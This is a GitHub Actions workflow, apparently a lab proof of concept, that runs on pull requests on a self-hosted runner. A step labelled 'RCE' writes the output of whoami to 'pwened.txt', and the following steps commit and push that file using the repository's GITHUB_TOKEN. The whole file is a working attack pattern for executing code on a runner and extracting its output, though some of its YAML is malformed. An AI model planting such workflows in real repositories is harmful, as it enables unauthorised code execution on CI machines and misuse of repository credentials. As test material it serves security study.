name: Lab Runner Test

on: [pull_request]

jobs:
  test:
    runs-on: self-hosted
    steps:
      - name: RCE
        run: |
          whoami > pwened.txt

      - name: Commit and Push pwened.txt
        uses: EndBug/add-and-commit@v7
        with:
          author_name: 'GitHub Actions'
          author_email: 'actions@github.com'
          message: 'Add Extracted Results'
          add: 'pwened.txt'
          cwd: ./

        - name: Push changes
        run: |
          git config --local user.name "GitHub Actions"
          git config --local user.email "actions@github.com"
          git add pwened.txt
          git commit -m "Add pwened.txt results"
          git push
        env: 
          GITHUB_TOKEN:${{ secrets.GITHUB_TOKEN}}
